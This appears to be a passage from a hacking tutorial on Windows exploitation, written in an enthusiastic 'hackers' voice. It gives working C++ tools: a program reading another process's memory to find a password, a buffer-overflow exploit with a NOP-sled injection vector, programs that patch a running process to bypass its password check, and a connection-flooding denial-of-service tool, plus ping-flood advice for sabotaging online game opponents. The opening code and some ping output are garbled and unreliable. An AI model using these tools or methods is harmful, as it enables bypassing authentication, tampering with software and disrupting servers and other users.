    FILE *fp;
    int offset;
    char *res;
    char *mPointer;
    char buffer[SIZE + 1];
    char pass[40];
    char *passPointer = NULL;
.. procID). buffer.unsigned int procID... fp = fopen("passfinder.. /* --------------------. if (!ReadProcessMemory(hInst. else { cout << ". i < SIZE.Success" << endl. cout << "Reading remote process memory .getline(pass... for(int i = 0. goto exit.. pass)) != NULL) goto success..The string search algorithm ends ---------------. FALSE.failed" << endl. cin. mPointer. SIZE. cout << "Enter the password to search: ". 0) == NULL) cout << "...txt".. cout << "Searching the password in remote process memory:" <<endl. 165 . it is optional to dump memory contents in a text file. fp). i <= SIZE.. mPointer = (char *)0x0012FF10. i++) fputc(((char *)buffer)[i]. 39). } // You can remove this FOR loop.Failed" << endl. cin >> procID.. goto exit.*/ for(i=0... "a"). HANDLE hInst = OpenProcess(PROCESS_ALL_ACCESS.*/ cout << ". } /* --------------------. cout << "Enter the PID: ".....The string search algorithm --------------------.". i++) { if (buffer[i] == pass[0]) if((res = strstr(&buffer[i].
success:
    cout << "....success" << endl << endl;

    /* ---------- The memory address calculation algorithm ---------- */
    offset = res - &buffer[0];
    passPointer = mPointer + offset;
    printf ("The password is @ position : %08x", passPointer);

exit:
    return EXIT_SUCCESS;
}

The strstr function takes two string pointers as arguments and returns the address of the memory location where the password is found. The first argument is the address of the string in which it needs to search for the second argument string. In case of failure it returns NULL. The passfinder.exe will calculate the address of the user-supplied password in secpass.exe by accessing its memory contents and searching for the user-supplied password.

Let us check out the working of passfinder.exe using the well-familiar example secpass.exe. Execute secpass.exe and, when asked for a password, enter "adminpass" as the password (without quotation marks) and press Enter.
Now check the process ID of secpass.exe using the tasklist command. The numbers below the PID header are the process IDs of the respective processes.
Execute passfinder.exe. When asked, enter the password you entered in secpass.exe (adminpass), or a little portion of the password adminpass, and enter the PID of secpass.exe. If successful, the output of passfinder will be as shown in the picture.
The address of the password is shown to be 0x0012FF68; this is the address in secpass.exe. The process ID shown in the next figure is 0x720 in hex format, which is equivalent to 1824 in decimal.

Now start VC++ and click "Build\Start Debug\Attach to Process…" as shown in the figure. From the list of processes, select secpass as shown in the figure.
Now, when the debugger pops up, click on the Debug menu and then Break. Wait for the debugger to break the execution — the color of most of the entities shown on the debugger screen turns red.
Now type the memory address shown by passfinder — in this case 0x0012FF68 — into the memory address window and press Enter. If the memory window is not shown on your screen, open it from "View\Debug Windows\Memory". Then check out the memory window contents. Thus, with the help of passfinder, we have increased the power of our debugger: we can now search for any string at any memory location in any process. With all this, we have a tremendous increase in cracking power.
Developing Exploits

A hacker is one who can write his own exploit code. Well friends, in this discussion we'll be studying the automation of the exploitation process. We mean, we do not need to manually feed the injection vector; instead we will write a script which will automatically exploit the vulnerabilities. Don't think that exploit codes are of larger sizes — compactness is their first feature.

The exploits are of two types:

1) Local exploits
2) Remote exploits

Local Exploits: Local exploits are used to exploit the local system (the system on which the exploit resides).

Remote Exploits: Remote exploits are capable of exploiting remote systems. These exploits have to transmit the injection vector through the networks. Remote exploit development needs the knowledge of socket programming — friends, start learning some of the network programming techniques. Nowadays exploits are capable of finding their suitable target systems, scanning them for vulnerabilities, and then trying to exploit the victim. Thus, these exploits work as a virtual launch pad, as in missile systems. The parts of a remote exploit are similar in working and architectural logic to a missile system: capable of finding the target, transporting the exploit code, and triggering it. Well friends, if you have any knowledge of the structure of a missile, then it can really help you a lot. In this discussion we will be creating the virtual missiles and rockets.

Several techniques are used by remote exploits to keep the attacks stealth. In initial discussions we shall be discussing the simple techniques, but slowly we shall be moving to the ultra-advanced technologies used for stealth (hidden and calm) attacks, bypassing the radar technologies such as IDS (Intrusion Detection System), IPS (Intrusion Prevention System), firewalls, etc.

Before proceeding, let's discuss the structure of the injection vector first. The whole technique is
analogous to the ultra-tech missile & rocket technology.

The Injection Vector

The injection vector is actually a virtual missile. Let's check out the following figure:

NOP SLED | SHELLCODE | REPEATED RETURN ADDRESS

The NOP sled is placed in the first part of the injection vector. Note: remember that the NOP (No Operation, hex 0x90) instruction does nothing; it just transfers control to the next instruction.

Then the shellcode is placed. The shellcode is a block of compiled, self-sufficient machine instructions which can perform the desired task. We'll study the shellcode-writing techniques in the forthcoming sections.

After the shellcode, the address of the memory block in the stack where our payload resides is placed, so as to overwrite the saved return address on the stack; this address gets loaded at the next return instruction. The payload's return address is repeated in the injection vector if the buffer is of larger size. This is done to align the injection vector so that the desired return address can smoothly intersect the EIP. But why repeat it? Because the attacker does not always know the exact address of the memory location where the shellcode resides in the vulnerable process memory space; a perfectly aligned injection vector needs knowledge of the size of the vulnerable buffer. The injection vector is responsible for the alignment of the payload (shellcode) and the saved return address. A rough guess of the memory address placed at the saved return address will lead the processor to land somewhere in the NOP sled, and the NOP sled will then hand over the execution to the shellcode smoothly.
This is a problem, because the string-handling functions stop reading strings where a NULL byte is encountered. Remember, the stack memory addresses contain NULLs. So if we are directly placing a memory address containing a NULL, then there is no need to repeat it — just place it at the end of the injection vector, or use some other technique to execute the payload. We will discuss a few such techniques in the next section.

Note: In the later sections we will be discussing the development techniques of the shellcodes for Linux and Windows. But for simplicity we will be using the same NOP & jump payload here.

Let us frame a vulnerable program:

/* overflow.cpp */
#include <iostream>
#include <cstdio>      // fprintf
#include <cstdlib>     // exit, system
#include <cstring>     // strcpy
using namespace std;

int main (int argc, char* argv[])
{
    char name[15];

    if ( argc < 2) {
        fprintf (stderr, "Usage:\n%s <string>", argv[0]);
        exit(-1);
    }

    // system("PAUSE");
    //----------------buffer overflow section code-------------
    strcpy (name, argv[1]);
    //-----------------buffer overflow section end-------------
    cout << "This is an buffer overflow example." << endl;
    cout << "If string buffer will exceed 15 bytes, it will cause an overflow." << endl;
    system("PAUSE");
    return EXIT_SUCCESS;
}
Compile this program in CL with the /Gs switch, as:

CL /Gs overflow.cpp

We have placed a commented system("PAUSE") function in the code. Just remove the comment characters '//', save the program as a different copy & compile it. This is done to know the state of the program & stack memory during the execution of the program. Run the recently compiled program, which contains the system("PAUSE") before the cout statements, and pass it the string "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" as the argument. Wait for the statement "Press any key to continue...".

Now open Visual C++ 6.0 (or any compiler or debugger you have — most compilers have a debugger built in). Click on Build->Start Debug->Attach to Process and select the recently executed program's name. Now press Enter in the main process and wait for the debugger to highlight it. When you see the assembly instructions, click on Edit->Goto & type the address 0x0040107E (a rough address in the beginning of the program) in the text box.

There are a few addresses that look like they are pointing to the data section. These are 40E0A0, 40E0B4, 40E0BC, 40E0E0 (there are more, but we choose these). These addresses are pointing to the strings which are used in the program, like "PAUSE" and all the cout strings. Check out these addresses by placing them in the memory box's address text box and pressing Enter.

Well, then check out a function call which takes two arguments — it handles two memory buffers; therefore it is the strcpy() function:

004010F2 8B 55 0C        mov  edx,dword ptr [ebp+0Ch]
004010F5 8B 42 04        mov  eax,dword ptr [edx+4]
004010F8 50              push eax
004010F9 8D 4D F0        lea  ecx,[ebp-10h]
004010FC 51              push ecx
004010FD E8 3E 33 00 00  call 00404440
00401102 83 C4 08        add  esp,8

Insert a breakpoint by right-clicking somewhere before the call instruction. Now press F10 (in Visual C++ 6.0) or execute a single
instruction each time until

00401102 83 C4 08        add  esp,8

Now check out the stack memory by loading the ESP register's value in the memory window. Find the string "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" and note its beginning address. This is the address we are hunting for. (By the way, the EAX register contains the same address.) In our case it is 0x0012FF70, as in the figure.

Now we have the required raw material. We should start the exploit development.
Exploit Code Development

Developing an exploit means inventing the cure for a disease. The exploit development needs the knowledge of a few system calls. One important function (or syscall) is execve(); we can also use execl(). The execve is capable of starting a process and passing it explicit arguments. The definition of execve is:

_CRTIMP int __cdecl execve(const char *, const char * const *, const char * const *);

It takes the pointer to the name of the process to be started as its first argument. The second argument is an array of pointers, which is as:

char *arguments[n];
arguments[0] = "Command to execute the process (process name)";
arguments[1] = "FIRST ARGUMENT";
arguments[2] = "SECOND ARGUMENT";
...
arguments[n-2] = "(n-2)th ARGUMENT";
arguments[n-1] = NULL;

Let us use execve in our exploit code as:

/* expl.cpp */
#include <iostream>
#include <process.h>
using namespace std;

int main ()
{
    char *program;
    char *argone;
    char *arguments[3];

    cout << "Before Injection Vector." << endl;
    program = "overflow";
    // Injection Vector.
    argone = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\xF8\x71\xFF\x12";
    // Injection Vector ends.
    arguments[0] = program;
    arguments[1] = argone;
    arguments[2] = 0;
    execve(program, arguments, 0);
    return EXIT_SUCCESS;
}

Compile this program and execute it, and check the CPU performance in Task Manager: it will be 100%, and the system will start crawling and will hang up. Wow!!! We created our first exploit — a working virtual missile. In the same way we can develop other local exploits.
Remote Exploit Development

The remote exploits are like real missiles. Remote exploits differ from local exploits in lots of respects; the major difference is that the remote exploit has to propagate the payload through networks and strike the target system. The remote exploits employ network programming, or socket programming. Before indulging in this topic, we should first learn some fundamentals of socket programming. Well friends, socket programming is the most interesting part of programming, so let's enjoy it in the next section.
Socket Programming

The networked systems utilize software developed using sockets. A protocol is software which works as a mediator between two systems to get them successfully networked together; or, a protocol is a set of instructions which must be obeyed by both systems for a successful connection. There are several protocols used in the different layers of networks, but we are interested in only TCP and UDP. Both of these protocols work on the transport layer of networks. (We'll study the different layers of networks in detail in the next few sections.)

Good news, hackers: we are not going to discuss all aspects of all networking protocols. Instead, we'll just discuss the things necessary to form a connection with remote systems, transport the payload to the remote system, inject the payload into the vulnerable process, and finally execute the payload. The whole job listed above will be done for us by the protocols and networking layers; we need to utilize just a few socket functions in our exploits. But we must know a few properties of the different protocols used in networking.

TCP, which stands for Transmission Control Protocol, is a reliable protocol, while UDP, which stands for User Datagram Protocol, is an unreliable protocol. In TCP, reliability means that a proper connection is formed prior to the data transmission, an acknowledgement receipt is transmitted for every chunk of received data, and if transmitted data gets corrupted or does not reach its destination then it is sent again. No such facility exists in UDP: the server takes no responsibility for data corruption or any missing datagram during the transmission, and no connections are formed between the systems. TCP produces huge network traffic compared to UDP, due to the handshake and the acknowledgement packets in TCP. TCP is used where every single bit of data is necessarily needed, like in encrypted data channels, etc., and UDP is used where quality doesn't matter too much, like in streaming audio & video.
Note: To compile the above exploit, first save and build the project (Ctrl+S, and then F7). Then, from the Project menu, select 'Settings', and in the 'Link' tab add wsock32.lib in 'Object/library modules'. Separate it from the other entries with a blank space, and then compile.
Tricks to Execute Payload

Well, we can make our custom payload execute. But the situation is not always the same; we may be caught in worse situations, with difficulty in executing the payload. Let's discuss some of the tricks used to explode the payload.
Return with ret

Let's discuss the specialties of the ret instruction; its hex equivalent is C3. The ret instruction causes the address at the ESP value to be loaded into EIP — meaning, whatever is at the top of the stack will be loaded into the EIP register. The ESP always points to the top of the stack, and our custom-coded injection vector lies in the stack, with the saved return address changed to our own custom code buffer, leaving the buffer at the top of the stack. Thus, when ret is executed, the ESP at this point must contain the pointer (address) to the shellcode (our custom code). As a result, EIP will point to the shellcode and will execute it. Remember, the changed saved return address gets the executional control only after the ret call — that was why, in the above examples, the custom code was getting control after the main() ret was called.
Stack Protection

Windows XP and 2003 differ from earlier Windows in security mechanisms: XP and 2003 employ stack protection, which makes the stack overflow difficult (but not impossible). Actually, the top of the stack is written with a cookie, also called a "CANARY". The CANARY is an unsigned integer (four-byte) value. The CANARY is highly random and is generated by numerous XORs among different values, which in turn change with time. Remember, a copy of the canary, saved in the data section while it is generated, is also called the authoritative canary or authoritative cookie. The overview of the memory is as shown in the figure below.

Thus it is clear from the figure that if we try to overwrite the EIP by overflowing the buffer string, the canary will also get overwritten. Thus, after a buffer overflow, these two canaries will differ, and an error will be generated which will invoke the exception-handling mechanism. The whole process mechanism of this
kind of security is discussed in the next section.

The CANARY Exception Mechanism

The canary is generated as an essential routine every time any module is loaded into memory or any function's set of arguments is loaded onto the stack memory. Well, this canary acts as a seal on the lock of the stack memory. If this seal does not match the authoritative canary in the data section, then the UnhandledExceptionFilter function is called, and this function starts the process of shutting down the process. But before the shutdown, a few steps are taken by the UnhandledExceptionFilter function: actually, this function loads the faultrep.dll library and calls the ReportFault function from it. And it results in the popular "Report this fault to Microsoft" message box, which is also commonly known as the "Don't Send Error Report" box.
The Canary Generator

Microsoft Visual Studio imposes the cookie security by default in code. Actually, the GS flag in Visual Studio is by default always turned on, and is responsible for imposing such behavior. The cookie is highly random and cannot be predicted easily. Let's see how the canary is generated:

/* canarygenerator.cpp */
#include <iostream>
#include <windows.h>
using namespace std;

int main (int argc, char* argv[])
{
    FILETIME ft;
    LARGE_INTEGER perfcount;
    unsigned int Canary = 0;
    unsigned int tmp = 0;
    unsigned int *ptr = 0;

    GetSystemTimeAsFileTime (&ft);
    //------The XOR section begins-----
    Canary = ft.dwHighDateTime ^ ft.dwLowDateTime;
    Canary = Canary ^ GetCurrentProcessId();
    Canary = Canary ^ GetCurrentThreadId();
    Canary = Canary ^ GetTickCount();
    QueryPerformanceCounter (&perfcount);
    ptr = (unsigned int *) &perfcount;
    tmp = *(ptr + 1) ^ *ptr;
    Canary = Canary ^ tmp;
    printf ("Generated Canary : %08x\n", Canary);
    system("PAUSE");
    return EXIT_SUCCESS;
}

Now it's time to discuss some of the ways to crack down the
canary security.
Breaking In with the Canary Check

Before going through this discussion deeply, we should again study a little portion of the memory model of the software which handles the stack and heap. Then we locate the placement of the canary and find out the different ways to thwart the canary-check mechanism. What if the shellcode executes before the canary check?

C:\access denied\code\Debug>overflow AAAAAAAAAAAAAAAAAAAA`^P@
This is an buffer overflow example.
If string buffer will exceed 15 bytes, it will cause an overflow.
Press any key to continue . . .

C:\access denied\code\Debug>overflow AAAAAAAAAAAAAAAAAAAA`^Q@
This is an buffer overflow example.
If string buffer will exceed 15 bytes, it will cause an overflow.
Press any key to continue . . .
Dereferencing the Heap

Like the stack, the heap objects can also be exploited, if a buffer overflow occurs in heap object instances. But the problem is that the saved return address is not saved on the heap — it is on the stack. Then how do we make the shellcode run by a heap overflow? For finding its answer we need to study the structure of the heap, and then check out all possibilities & techniques to exploit heap-related overflows. Let's check out the architecture of the heap:

Heap structure (rough overview)
Modifying the Process Memory

This is one of the worst kinds of attack for security systems. The attacker does not need privileges — even Guest users can launch this attack. Before proceeding, let's discuss some aspects of process memory management carried out by the operating system.

A program during its execution time is called a process. Every process is assigned a unique, random process ID every time it is launched into memory for execution. The process ID can be checked using the TASKLIST command in Windows and PS on Linux systems. There is never a single process running at a single instance of time; the list is always large, even when a minimum of programs is running. Windows NT-type executables are also called PE (Portable Executable) images. By default, every PE image is loaded at 0x00400000, and the first executable code lies at 0x00401000.

But how is it possible to launch several processes at the same time at the same addresses? Well friends, it's not magic — Windows keeps track of each & every process in its own manner. Every process has its own segment; every segment may have the same logical addressing, but every segment is located at a different physical address. Thus it becomes clear that many processes may be launched at the same logical addresses, yet they will be physically located at different physical addresses and will be identified by physical addressing, i.e. the segments. It is analogous to books: different subject books have the same page numbers (1, 2, 3, 4, ..., n), but every page contains different text at the same page number. It's really magical how the OS flips in another program's code at the same addresses when we click on another process, and loads the earlier code back at the same memory addresses when we jump back to the earlier process.

Every process also has several different sections in its own process space. The sections are made up of memory pages: a group of pages having the same attributes and characteristics is identified as a section, like '.text', '.data', etc. All these sections are loaded into a single segment in memory. A single section may have a number of memory pages, depending upon its size. Every page has a special attribute which identifies its access privileges; if a user does not have the appropriate privileges, then he cannot access that page in memory. Even the 'text' section, containing the executable code, normally has 'read only' attributes. But we can modify such pages effectively.

Like the pages, segment tracking is done by the operating system using special CPU registers named segment selectors, mainly 'SS', 'CS', 'DS', 'FS', etc. When we click on another process, the operating system just loads the corresponding process's memory segment — by jumping between processes, the segment selectors select the appropriate segment in the execution environment. Now consider it: if a processor architecture were to have special selector registers for OS selection, it would be capable of executing several instances of operating systems simultaneously.

Normally, no process is allowed to access another process's memory. But we will use two functions provided by kernel32.dll to do so: OpenProcess and WriteProcessMemory. The kernel32.dll is loaded each & every time a process is loaded into memory. It means we can use those functions even from the lowest privilege mode, ring3, or guest mode, to alter a process's memory directly. The technique used here is actually used by software developers to masquerade the code dealing with security systems; but we will use the same technique in a different way, to make any secure software vulnerable. For this purpose we have to jump into that process's memory and then carry out the hacks. This is one of the most fatal attacks on computer systems, as any user can redirect the executional flow to whatever branch of the code he wishes. Moreover, flawless software can also be
made vulnerable, even if it is neatly developed, by introducing several buffer overflows wherever possible. (Remember that the pages which are essentially required by the system carry kernel-mode privileges and cannot be accessed from any ring other than ring0.) By now you will be able to identify and remediate the security codes. Remember that, sooner or later, a test condition always produces branches. One more thing: the user-entered data passing the filter-checking code can be changed after the checking. Also, the stack & heaps can be modified, or any arbitrary shellcode can be used to replace the original code, or static data can be changed. And, last but most dangerous of the attacks: the return address can be directly changed to the desired address successfully, without a buffer overflow and without thwarting the canary security check.

It's time to do it practically. Let us frame an example: consider the earlier secpass.exe program. We are going to change the test condition which checks for the original password; if matched, the conditional jumps jne or je are followed according to the situation. Check it out in the code:

004010BE: 68 C0 30 41 00     push 4130C0h        ; "Enter the password:" string address is pushed on the stack of the next function
004010C3: 68 70 4C 41 00     push 414C70h
004010C8: E8 D3 13 00 00     call 004024A0
004010CD: 83 C4 08           add  esp,8
004010D0: 6A 15              push 15h
004010D2: 8D 55 E8           lea  edx,[ebp-18h]
004010D5: 52                 push edx
004010D6: B9 00 4D 41 00     mov  ecx,414D00h
004010DB: E8 F0 02 00 00     call 004013D0
004010E0: 8D 45 E8           lea  eax,[ebp-18h]
004010E3: 50                 push eax
004010E4: 8D 4D D4           lea  ecx,[ebp-2Ch]
004010E7: 51                 push ecx
004010E8: E8 73 47 00 00     call 00405860
004010ED: 83 C4 08           add  esp,8
004010F0: 85 C0              test eax,eax
004010F2: 75 14              jne  00401108
004010F4: 68 D8 30 41 00     push 4130D8h
004010F9: E8 BD 46 00 00     call 004057BB
004010FE: 83 C4 04           add  esp,4
00401101: 6A 00              push 0
00401103: E8 DE 45 00 00     call 004056E6
00401108: 68 50 11 40 00     push 401150h
0040110D: 68 E0 30 41 00     push 4130E0h        ; the "Login failed" string
00401112: 68 70 4C 41 00     push 414C70h
00401117: E8 84 13 00 00     call 004024A0
0040111C: 83 C4 08           add  esp,8
To remediate it, we either change the test to xor, or change the jne to je so that it will not be followed if we pass it a wrong password. To do it we need to change the respective hex numbers from 0x85 to 0x33, or from 0x75 to 0x74 — it will probably fix the situation. So we have to alter the .text section and overwrite the code at 0x004010F0 or at 0x004010F2. Well friends, let's do it. We are going to write the code in infectsec.cpp as:

/* infectsec.cpp */
#include <iostream>
#include <windows.h>
using namespace std;

int infect (unsigned int pid, void *address, int instruction)
{
    HANDLE h;
    h = OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_WRITE, true, pid);
    return WriteProcessMemory(h, address, &instruction, 1, NULL);
}

int main (int argc, char* argv[])
{
    unsigned int processID;
    cout << "Enter the ProcessID: ";
    cin >> processID;
    infect(processID, (void *)0x004010F0, 0x33);
    cout << "Status:...Done" << endl;
    return EXIT_SUCCESS;
}

The OpenProcess requires the essential access type to open processes, which are as:

#define OWNER_SECURITY_INFORMATION  (0X00000001L)
#define GROUP_SECURITY_INFORMATION  (0X00000002L)
#define DACL_SECURITY_INFORMATION   (0X00000004L)
#define SACL_SECURITY_INFORMATION   (0X00000008L)
#define PROCESS_TERMINATE           (0x0001)
#define PROCESS_CREATE_THREAD       (0x0002)
#define PROCESS_SET_SESSIONID       (0x0004)
#define PROCESS_VM_OPERATION        (0x0008)
#define PROCESS_VM_READ             (0x0010)
#define PROCESS_VM_WRITE            (0x0020)
#define PROCESS_DUP_HANDLE          (0x0040)
#define PROCESS_CREATE_PROCESS      (0x0080)
#define PROCESS_SET_QUOTA           (0x0100)
#define PROCESS_SET_INFORMATION     (0x0200)
#define PROCESS_QUERY_INFORMATION   (0x0400)
#define PROCESS_ALL_ACCESS          (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFF)

Instead of using PROCESS_VM_OPERATION|PROCESS_VM_WRITE, we can also use PROCESS_ALL_ACCESS.

Now compile the above program, then execute the secpass.exe process and check its normal, flawless working. Now check the list of tasks running with the tasklist command and note the process ID of secpass.exe. Execute infectsec.exe, enter the process ID of secpass.exe, and press Enter. Now enter any wrong password in secpass.exe and press Enter... wow! The new command console pops up, which should occur only if the original password is given. We broke it again, by overwriting the machine code.

Friends, this technique is used by hackers in network games. A player sits on the gaming system and plays with his counterparts on remote systems, while his teammate hackers sit on other systems, log in to his system's console, and change the instructions of the game code in memory so as to make him win. The things most commonly done are like changing the damage caused by a gunfire, making it equivalent to the damage done by tanks or rockets, or fixing his lives at hundred percent, etc.

Now let's make a program which will be capable of overwriting any other process's memory:

/* infection.cpp */
#include <iostream>
#include <windows.h>
using namespace std;

int writeJmp(int pid, void *address, int instr)
{
    HANDLE hInstance;
    hInstance = OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_WRITE, true, pid);
    return WriteProcessMemory(hInstance, address, &instr, 1, NULL);
}

int main (int argc, char* argv[])
{
    unsigned int addr;
    int processID, instruction;

    cout << "Enter the processID: ";
    cin >> processID;
    cout << "Enter the memory address (in decimal): ";
    cin >> addr;
    cout << "Enter the instruction (in decimal) : ";
    cin >> instruction;

    if ((writeJmp(processID, (void *)addr, instruction)) == -1)
        cout << "Failed to overwrite the instruction." << endl;
    else
        cout << "The instruction is changed in executing process successfully" << endl;
    return EXIT_SUCCESS;
}

Compile the above program and execute it. But you need the desired process's process ID (PID); you can get the PID from the tasklist command. Then the memory address, as well as the instruction, must be in decimal number format — use the calculator for this purpose (the PID is already shown in decimal format in the tasklist output).

C:\access denied\code>tasklist

Image Name                 PID    Session Name  Session#  Mem Usage
========================= ====== ============== ======== ============
cmd.exe                     328   Console          0       4,200 K
secpass.exe                2060   Console          0         628 K
tasklist.exe                236   Console          0       2,120 K

C:\access denied\code>infection
Enter the processID: 2060
Enter the memory address (in decimal): 4198640
Enter the instruction (in decimal) : 51
The instruction is changed in executing process successfully
In the above excerpt, 4198640 is the decimal equivalent of the memory address 0x004010F0, and 51 is the decimal equivalent of 0x33 (the XOR instruction).

The above tool can be configured to change a whole block of code at a time, by changing the 4th argument of WriteProcessMemory(hInstance, address, &instr, 1, NULL) — it can vary from 1 to the block size — and providing it the pointer to the new block of instructions instead of a single instruction. This tool can be used to effectively make any software vulnerable during runtime: it will make the safe functions like getline (in GUI applications, the GetWindowTextA function from user32.dll, which is used to get text input from users in text boxes, also uses a bound limit) vulnerable in the Windows environment. We checked earlier that if we increase the index bound limit beyond the memory buffer size, it will cause an overflow.

Well friends, let's make secpass.exe prone to buffer overflow. First we need to identify the getline function in the disassembled dump:

004010D0: 6A 15              push 15h            ; the string size to be taken in the memory buffer
004010D2: 8D 55 E8           lea  edx,[ebp-18h]  ; pointer to the string is formed
004010D5: 52                 push edx            ; pointer to the string is pushed on the stack
004010D6: B9 00 4D 41 00     mov  ecx,414D00h    ; the address of the getline function
004010DB: E8 F0 02 00 00     call 004013D0       ; call for the cin function

Check out the bold line at address 0x004010D0: it pushes 0x15 onto the stack (push always puts a value on the stack). Now open the calculator and convert hex 0x15 into decimal format — it is 21, isn't it? Remember the source code in secpass.cpp, especially the cin line:
cin.getline(buffPass, 21);

Let's increase this bound to cause an overflow in secpass.exe. For this hack, we again need three things. First, we have the target instruction — or, you can say, the array index bound. We have to change the 0x15, & not the 6A, in "6A 15". But the address 0x004010D0 is that of the instruction byte 6A; therefore the address where the 15 lies will be 0x004010D0 + 0x1 = 0x004010D1. Change it to decimal: it is 4198609. The second thing is the new string length: we can overwrite it with any number up to 0xFF (255 in decimal). And the last thing is the processID, as usual. Now we can suppose that the rest of the attack you can do yourself.
The Denial of Service Attacks

The worst kind of attack is the DOS attack, also known as the Denial of Service attack. As the name makes clear, the server is forced not to serve any more legitimate requests. This attack is the nightmare of all e-businesses; every year, businesses around the world lose thousands of billions of dollars due to this attack. The DOS attack may be the result of a lack of software or hardware efficiency. The attack can be easily planned by analyzing statistical data, or by forcing the system to fall into an undesired condition having no handling branch or exception handling.

For example, IIS 5.1 on Windows XP supports only 9 simultaneous connections. This kind of system can be found in college hostels or in small-office or home networked environments. But suppose we try to connect a 10th connection: it will refuse the connection. Now suppose all legitimate connections are eliminated by forged connections — then the server will deny any more requests from the legitimate users. This data is enough to launch a DOS attack against such a server. Let's frame an example exploit for such an attack.

Note: This exploit is for study purposes and is a proof-of-concept exploit. This exploit is not safe to be used to attack other systems. Any damage to someone's intellectual property caused by running this exploit will be the responsibility of the attacker himself.

/* denser.cpp */
#include <iostream>
#include <winsock.h>
#define RPORT 80
using namespace std;

int main (int argc, char* argv[])
{
    SOCKET s;
    WSADATA wsaData;
    SOCKADDR_IN rem_addr;
    int a = 178;   // To show the progress meter (a white box in ASCII).

    cout << "created by:       ******Xtremers******" << endl;
    if ( argc < 2) {
        cout << "usage: denser <ip addr>" << endl;
        exit(1);
    }

    if ((WSAStartup (MAKEWORD(1, 1), &wsaData)) != NULL) {
        perror("WSAStartup");
        exit(1);
    }

    rem_addr.sin_family = AF_INET;
    rem_addr.sin_port = htons(RPORT);
    rem_addr.sin_addr.S_un.S_addr = inet_addr(argv[1]);
    memset(&(rem_addr.sin_zero), 0, 8);

    cout << "Progress: ";
    for (int i=0; i <= 10000; i++) {
        if ((s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
            perror("socket");
        }
        if ((connect(s, (struct sockaddr *)&rem_addr, sizeof(struct sockaddr))) == -1) {
            perror("connect");
        }
        printf ( "%c", a);
    }
    cout << endl << "Thanx." << endl;
    return EXIT_SUCCESS;
}

Note: To compile the above exploit, first save and build the project (Ctrl+S, then F7), then from the Project menu select 'Settings', and in the 'Link' tab add wsock32.lib in 'Object/library modules'. Separate it from the other entries with a blank space, and then compile denser.cpp. Let's check out its output:
C:\Documents and Settings\vinnu\Develop\opensource>denser
created by:       ******Xtremers******
usage: denser <ip addr>

C:\Documents and Settings\vinnu\Develop\opensource>denser 127.0.0.1
created by:       ******Xtremers******
Progress:

As we see, we are running the above exploit, denser, on the local machine (remember to clear the web browser's history first). Then try to open the websites loaded in your web server, or just type the server name in the address box to open the default homepage — but it sends us an error message in the web browser. We can check out the connections with the netstat -a command:

C:\Documents and Settings\vinnu>netstat -a

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    NASA:ftp               0.0.0.0:0              LISTENING
  TCP    NASA:telnet            0.0.0.0:0              LISTENING
  TCP    NASA:smtp              0.0.0.0:0              LISTENING
  TCP    NASA:http              0.0.0.0:0              LISTENING
  TCP    NASA:epmap             0.0.0.0:0              LISTENING
  TCP    NASA:https             0.0.0.0:0              LISTENING
  TCP    NASA:microsoft-ds      0.0.0.0:0              LISTENING
  TCP    NASA:1025              0.0.0.0:0              LISTENING
  TCP    NASA:1027              localhost:http         TIME_WAIT
  TCP    NASA:1028              localhost:http         TIME_WAIT
  TCP    NASA:1029              localhost:http         TIME_WAIT
  TCP    NASA:1031              localhost:http         TIME_WAIT
  TCP    NASA:1032              localhost:http         TIME_WAIT
  TCP    NASA:1033              localhost:http         TIME_WAIT
  TCP    NASA:1034              localhost:http         TIME_WAIT
  TCP    NASA:1035              localhost:http         TIME_WAIT
  TCP    NASA:1036              localhost:http         TIME_WAIT
  TCP    NASA:1037              localhost:http         TIME_WAIT
  TCP    NASA:1038              localhost:http         TIME_WAIT
  TCP    NASA:1039              localhost:http         TIME_WAIT
  TCP    NASA:1040              localhost:http         TIME_WAIT
  TCP    NASA:1041              localhost:http         TIME_WAIT
  TCP    NASA:1042              localhost:http         TIME_WAIT
  TCP    NASA:1043              localhost:http         TIME_WAIT
  TCP    NASA:1044              localhost:http         TIME_WAIT

… and so on.

The exploit can be run from several machines simultaneously to attack more efficient servers, serving several thousand requests at the same time; in that situation the attack is called a DDOS attack (Distributed Denial of Service attack). The denial-of-service vulnerabilities are not always the fault of bad programming; they also emerge from the limited resources to be allocated, like CPU, memory, or data channels.

Online games are among the best victims of such resource-eating attacks. Best example: we ourselves are fond of games, but we are not very skillful in any single game. So whenever we play network or online games, we try to send a huge amount of junk data packets to our counterpart player's computer system, to occupy the precious network channels of the victim's network. The best example is the ping utility. We can either use a smurf attack, do a broadcast ping to the victim network, or send an unlimited number of ICMP packets (ping data packets are also called ICMP packets). The best thing about ping packets is that ICMP packets are by default allowed through to firewalled hosts, and ICMP packets are not logged on logging servers. We can also ping from several other systems for more effect. But remember that the ping-attacking host or network must be different from the one from which you'll play the network game.

Note: Place the victim host's address in place of 127.0.0.1. (We can also replace the last octet of the victim's address with 255, the broadcast address of the 127.0.0.0 network — but remember, most firewalls filter out broadcast pings.)

C:\Documents and Settings\vinnu>ping -t -l 1024 127.0.0.1

Pinging 127.0.0.1 with 1024 bytes of data:
1: bytes=1024 time<1ms TTL=128 Reply from 127. Lost = 0 (0% loss).1: Packets: Sent = 5.0.0. Approximate round trip times in milli-seconds: Minimum = 0ms.0. 204 .1: bytes=1024 time<1ms TTL=128 Reply from 127.1: bytes=1024 time<1ms TTL=128 Reply from 127.0. Maximum = 0ms.0.0.1: bytes=1024 time<1ms TTL=128 Reply from 127.0. the ping data packets route must be different from the route of your gaming portal and game server and the counterpart player should be playing from a different host. Received = 5. the attack will cause delay in games data packets transmission from counterpart player’s host to game server and we can easily defeat them.0.0.Reply from 127. But remember.0. Average = 0ms Control-C The effect of such an attack is that the target system network resources will be used up by unwanted packets and the precious bandwidth will get exhausted and thus.1: bytes=1024 time<1ms TTL=128 Ping statistics for 127. other than game server.0.0.
Leveraging Privileges to Ring0

In this attack, we leverage the execution mode from low privileges to ring0. Once in ring0, we can do anything unrestrictedly. Before proceeding further, let's discuss a little about privileges and the different rings.

